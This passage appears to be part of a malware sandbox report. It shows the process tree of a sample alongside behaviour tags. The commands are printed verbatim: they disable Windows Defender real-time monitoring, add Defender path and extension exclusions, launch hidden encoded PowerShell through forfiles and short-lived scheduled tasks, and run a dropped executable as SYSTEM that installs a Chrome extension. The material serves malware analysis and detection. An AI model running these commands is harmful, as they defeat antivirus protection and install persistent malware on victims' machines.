                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                          4⤵
                                                                                                                                          • Indirect Command Execution
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:2576
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                            5⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:3868
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                              6⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:4084
                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                7⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2496
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "gHLBcvMSV" /SC once /ST 01:31:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:1064
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /run /I /tn "gHLBcvMSV"
                                                                                                                                        3⤵
                                                                                                                                          PID:360
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /DELETE /F /TN "gHLBcvMSV"
                                                                                                                                          3⤵
                                                                                                                                            PID:1632
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:2508
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                                4⤵
                                                                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                PID:3964
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                              3⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:3352
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                                4⤵
                                                                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                PID:1768
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /CREATE /TN "gTGIICLNI" /SC once /ST 11:57:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                              3⤵
                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                              PID:1332
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /run /I /tn "gTGIICLNI"
                                                                                                                                              3⤵
                                                                                                                                                PID:1052
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /DELETE /F /TN "gTGIICLNI"
                                                                                                                                                3⤵
                                                                                                                                                  PID:3636
                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                                                                                  3⤵
                                                                                                                                                  • Indirect Command Execution
                                                                                                                                                  PID:3516
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1580
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                        5⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:1776
                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                          6⤵
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:3648
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:2576
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                      4⤵
                                                                                                                                                      • Windows security bypass
                                                                                                                                                      PID:1768
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3376
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                        4⤵
                                                                                                                                                        • Windows security bypass
                                                                                                                                                        PID:3360
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1736
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          4⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:2648
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:1844
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:3732
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd /C copy nul "C:\Windows\Temp\HIoTiJfsoGzpkHVf\fOmZTNvF\dlBLTqjtsdXuwhul.wsf"
                                                                                                                                                        3⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:3784
                                                                                                                                                      • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                        wscript "C:\Windows\Temp\HIoTiJfsoGzpkHVf\fOmZTNvF\dlBLTqjtsdXuwhul.wsf"
                                                                                                                                                        3⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        PID:3712
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:1160
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:3864
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:3412
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:3152
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:1100
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:3924
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:2960
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:1600
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:980
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:3476
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:2952
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:3780
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:2860
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:3636
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:2116
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          PID:3920
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:2664
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • Windows security bypass
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:1988
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1064
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                            4⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:2364
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                            4⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:1768
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2520
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              4⤵
                                                                                                                                                                PID:2648
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                4⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:1292
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:1532
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:3728
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    4⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:2500
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:3412
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      4⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:944
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2104
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:3840
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:3464
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:3392
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:3792
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                              4⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:1380
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:3476
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /CREATE /TN "gDMHoCilu" /SC once /ST 15:33:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                              3⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:2628
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /run /I /tn "gDMHoCilu"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3812
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /DELETE /F /TN "gDMHoCilu"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:880
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:2912
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:3052
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2944
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:2896
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /CREATE /TN "unWjgiOqmrJvCJdsa" /SC once /ST 13:53:29 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\vWVBWQY.exe\" 9Z /poxpdidCj 385121 /S" /V1 /F
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                        PID:3860
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /run /I /tn "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1100
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3460 -s 612
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:3656
                                                                                                                                                                                      • C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\vWVBWQY.exe
                                                                                                                                                                                        C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\vWVBWQY.exe 9Z /poxpdidCj 385121 /S
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                        PID:3840
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
